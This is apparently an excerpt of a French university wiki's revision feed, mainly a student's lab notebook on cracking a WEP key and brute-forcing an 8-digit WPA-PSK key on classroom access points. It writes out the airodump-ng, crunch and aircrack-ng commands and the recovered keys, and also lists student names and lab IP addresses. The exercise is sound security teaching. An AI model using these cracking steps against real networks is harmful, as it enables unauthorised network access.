Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12232</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12232"/>
		<updated>2026-02-10T17:54:31Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Cassage de la clef WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12227</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12227"/>
		<updated>2026-02-10T17:19:43Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Effraction WiFi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse MAC de cracotte10 est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit,&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09  -72        3        0    0  13   54e. WPA2 CCMP   PSK  kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12198</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12198"/>
		<updated>2026-02-10T16:32:46Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : Page créée avec « == Machines virtuelles ==  == Configuration réseau ==  == DNS/DNSSEC ==  == Serveur Apache ==  == Fail2Ban ==  == Effraction WiFi ==  == Sécurisation et accès WiFi par WPA2-EAP == »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11406</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11406"/>
		<updated>2026-01-26T10:24:54Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinux.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || || SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || || SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 ||&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11235</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11235"/>
		<updated>2026-01-20T13:17:17Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || || ||&lt;br /&gt;
|-&lt;br /&gt;
